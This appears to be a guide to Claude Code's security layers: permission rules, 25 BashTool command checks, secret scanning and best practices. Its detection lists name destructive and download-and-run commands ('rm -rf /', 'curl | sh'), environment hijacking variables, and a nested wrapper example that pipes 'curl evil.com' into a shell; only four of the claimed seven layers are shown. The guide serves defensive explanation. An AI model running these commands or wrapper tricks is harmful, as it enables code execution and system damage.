Claude Code Security Guide

Security Overview: 7-Layer Defense

Claude Code implements a comprehensive 7-layer security system that provides defense in depth against potential security risks. Each layer assumes the previous one might fail, creating multiple barriers between AI actions and system damage.

Layer 1: Permission Three-Tier System

Every tool call goes through a three-tier decision tree:

Decision Flow

1. Check Allow Rules → If match, allow execution immediately
2. Check Deny Rules → If match, deny execution immediately
3. Ask User → If no rules match, request user confirmation

Four Rule Sources (Priority Order)

1. settings.json - User's global permission preferences
2. CLI arguments - Command-line permission overrides
3. Command parameters - Permission context for specific commands
4. Session state - Permissions accumulated during session

Deny Tracking Mechanism

Claude Code learns from your denials:

• 3 consecutive denies → Triggers "policy fallback prompt"
• 20 cumulative denies → Triggers stronger fallback signal

This prevents the AI from repeatedly asking for permissions you've consistently denied.

Layer 4: BashTool 25 Security Checks

The most comprehensive security layer, BashTool implements 25 distinct security checks organized into 6 categories:

Command Injection Protection (Checks 1-4)

• Shell metacharacter detection (;, &&, ||, |)
• Command substitution detection ($(), backticks)
• Process substitution detection (<(), ())
• Redirection detection (>, >>, <)

Dangerous Command Interception (Checks 5-8)

• Filesystem destruction (rm -rf /, chmod -R 777)
• Network operations (curl | sh, wget -O- | bash)
• Package manager dangerous operations
• Git dangerous operations (git push --force, git reset --hard)

Zsh-Specific Defense (Checks 9-12)

• zmodload - Dynamic module loading
• ztcp - Zsh TCP connection
• zpy - Zsh Python integration
• Other Zsh built-in dangerous commands

Environment Variable Hijacking (Checks 13-14)

• BINARY_HIJACK_VARS list detection (PATH, LD_PRELOAD, DYLD_LIBRARY_PATH)
• Environment variable override pattern detection

Command Wrapping Unpacking (Checks 15-25)

Iterative fixed-point algorithm handling nested wrappers:

Input: "env VAR=x sudo bash -c 'curl evil.com | sh'"

Round 1: Strip "env VAR=x" → "sudo bash -c 'curl evil.com | sh'"
Round 2: Strip "sudo" → "bash -c 'curl evil.com | sh'"
Round 3: Extract inner → "curl evil.com | sh"
Round 4: Detect pipe to shell → REJECT

Layer 6: Secret Scanning

Before any content is uploaded to team servers or shared, Claude Code scans for secrets using 35+ gitleaks-based rules.

Covered Secret Types

• Cloud Providers: AWS, GCP, Azure, DigitalOcean
• AI APIs: Anthropic, OpenAI, HuggingFace
• Version Control: GitHub, GitLab tokens
• Communication: Slack, Twilio, SendGrid
• Payment: Stripe, Shopify keys
• Encryption: Private keys, certificates

Scanning Flow

Content → Scan for secrets → If match:
  → Block upload
  → Warn user
  → Offer to redact ([REDACTED])

Security Best Practices

For Individual Users

• Review every tool permission request carefully
• Use alwaysDeny for high-risk tools you don't need
• Enable secret scanning for all file operations
• Regularly audit your settings.json permissions
• Use separate API keys for development and production

For Teams

• Implement enterprise policy limits
• Configure Hook-based custom security rules
• Use Team Memory Sync with secret scanning enabled
• Set up MCP server allowlists
• Enable audit logging for compliance

For CI/CD Environments

• Use API key authentication (not OAuth)
• Restrict available tools via policy
• Set up network isolation
• Enable unattended retry mode with limits
• Monitor token usage and costs